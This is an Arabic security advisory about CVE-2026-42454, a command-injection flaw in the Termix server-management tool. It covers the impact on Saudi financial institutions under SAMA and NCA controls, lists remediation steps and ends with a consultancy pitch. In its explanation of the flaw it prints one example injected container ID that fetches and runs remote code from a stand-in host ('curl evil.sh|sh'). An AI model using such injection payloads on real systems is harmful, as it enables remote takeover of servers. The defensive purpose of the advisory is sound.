ثغرة Termix الحرجة CVE-2026-42454: تنفيذ كود يهدد بنوك SAMA

كشف باحثو الأمن في 8 مايو 2026 عن ثغرة حرجة في منصة Termix الشهيرة لإدارة الخوادم عبر الويب، حملت معرّف CVE-2026-42454 وحصلت على درجة 9.9 من 10 على مقياس CVSS. الثغرة تتيح لمهاجم مصادَق تنفيذ أوامر نظام تشغيل عشوائية على الخوادم المُدارة عبر Docker، وهو ما يضع المؤسسات المالية الخاضعة لرقابة البنك المركزي السعودي (SAMA) أمام مخاطر مباشرة على بنيتها التشغيلية.

تشريح ثغرة Termix CVE-2026-42454: حقن أوامر عبر معرّف الحاوية

المشكلة الجوهرية في Termix قبل الإصدار 2.1.0 تكمن في أن المنصة تستخدم قيمة containerId القادمة من المستخدم — سواء كمعامل في مسار URL أو ضمن رسالة WebSocket — وتدمجها مباشرةً في أوامر الـ shell دون أي تنقية أو تحقق. هذا الإهمال البرمجي البسيط نظرياً يحوّل أي طلب بسيط لإدارة حاوية إلى ناقل تنفيذ كود (RCE) كامل على الخادم المضيف.

المهاجم لا يحتاج إلى ثغرة في طبقة المصادقة؛ يكفي أن يحصل على بيانات اعتماد صالحة عبر التصيّد أو إعادة استخدام كلمات المرور المسربة، ثم يرسل قيمة معرّف حاوية مصاغة بطريقة خبيثة مثل abc123;curl evil.sh|sh ليحصل على تنفيذ كامل بصلاحيات العملية المضيفة لـ Termix، والتي تكون في الغالب صلاحيات root أو docker-group، أي تحكم فعلي بالخادم بأكمله.

لماذا تستحق هذه الثغرة اهتمام فرق الأمن في القطاع المصرفي

Termix أداة شائعة بين فرق DevOps والـ SRE لإدارة أساطيل الخوادم Linux وحاويات Docker من واجهة موحدة، وكثير من المؤسسات تنشرها داخلياً لتسهيل عمليات التشغيل اليومية. المشكلة أن أدوات إدارة البنية التحتية الإدارية (Tier 0) — مثل Termix وAnsible Tower وRundeck — إذا اختُرقت، فإن المهاجم يقفز فوراً إلى مستوى التحكم الإداري بكامل البيئة، متجاوزاً طبقات الحماية التقليدية.

ما يضاعف الخطر هو أن هذه الأدوات عادةً ما تخزّن بيانات اعتماد SSH ومفاتيح خاصة لعدد كبير من الأنظمة، وتستضيف أحياناً tokens لـ Kubernetes وHashiCorp Vault وسلاسل اتصال قواعد البيانات. اختراق Termix لا يعني خادماً واحداً، بل احتمال هبوط فوري على عشرات أو مئات الأصول الحساسة.

التأثير على المؤسسات المالية السعودية ومتطلبات SAMA CSCC

إطار SAMA Cyber Security Framework وضوابط CSCC تفرض على البنوك ومقدمي خدمات الدفع متطلبات صريحة في الفصول الخاصة بإدارة الأصول، وأمن أنظمة التطوير والتشغيل، وإدارة الثغرات. تحديداً، الضابط 3.3.5 يوجب رصد الثغرات الحرجة ومعالجتها خلال نوافذ زمنية مُحددة، فيما يشترط الضابط 3.3.14 حماية واجهات الإدارة المميزة (Privileged Access).

كما أن لائحة NCA ECC في الضابط 2-3-1 تطالب بحوكمة مفصّلة لإدارة الثغرات، والضابط 2-7 يفرض حماية الأنظمة الحرجة من الهجمات. ثغرة بدرجة 9.9 في أداة إدارة بنية تحتية تُعدّ بطبيعتها "نظاماً حرجاً" تستوجب استجابة طارئة موثّقة. على الجانب الآخر، إذا أدى الاستغلال إلى تسرب بيانات عملاء، تدخل المؤسسة مباشرة في نطاق نظام حماية البيانات الشخصية (PDPL) والتزاماته بإخطار الهيئة السعودية للبيانات والذكاء الاصطناعي خلال 72 ساعة.

التوصيات والخطوات العملية للاستجابة

1. الترقية الفورية: ترقية كل نسخ Termix إلى الإصدار 2.1.0 أو أحدث خلال نافذة لا تتجاوز 72 ساعة، مع تطبيق إجراءات إدارة التغيير الطارئة وتوثيقها لأغراض التدقيق.
2. عزل واجهة الإدارة: التأكد من أن واجهة Termix غير مكشوفة على الإنترنت وإجبار الوصول إليها عبر VPN أو bastion host مع MFA إلزامي ومصادقة تعتمد على شهادات.
3. صيد التهديدات: مراجعة سجلات Termix والـ shell history على الخوادم المُدارة بحثاً عن قيم containerId غير اعتيادية تحتوي رموز مثل ; أو | أو $()، خلال آخر 30 يوماً.
4. تدوير بيانات الاعتماد: اعتبار كل بيانات الاعتماد ومفاتيح SSH وtokens المخزّنة في Termix قابلة للاختراق وتدويرها فوراً، مع مراجعة سجلات الاستخدام.
5. تشديد المصادقة: فرض MFA على كل حسابات Termix، وتفعيل مراجعة دورية للحسابات الإدارية، وتطبيق مبدأ الصلاحيات الأدنى على الأدوار.
6. الكشف السلوكي: ضبط قواعد في منصة SIEM/EDR لرصد عمليات shell child processes غير متوقعة من العملية الأم لـ Termix أو من حاوية Docker.
7. إخطار الجهات التنظيمية: في حال وجود مؤشرات اختراق، الالتزام بمتطلبات الإخطار المنصوص عليها في إطار SAMA وفي PDPL ضمن المهل القانونية.

الخلاصة

تُذكّر CVE-2026-42454 بأن أدوات إدارة البنية التحتية ليست مجرّد طبقة تشغيلية، بل هي مستوى تحكم استراتيجي يستوجب نفس المستوى من الحوكمة والاختبار والمراقبة المطبّق على أنظمة الدفع وقواعد بيانات العملاء. حقن الأوامر الناتج عن غياب التحقق من المدخلات يبقى من أقدم الثغرات وأكثرها تكراراً، وهو دليل أن المراجعة الأمنية للكود ضرورة دائمة لا رفاهية.

هل مؤسستك مستعدة؟ تواصل مع فريق فنترالينك لتقييم مجاني لمدى النضج السيبراني وفق SAMA CSCC، يشمل مراجعة أدوات إدارة البنية التحتية وضوابط الوصول المميز.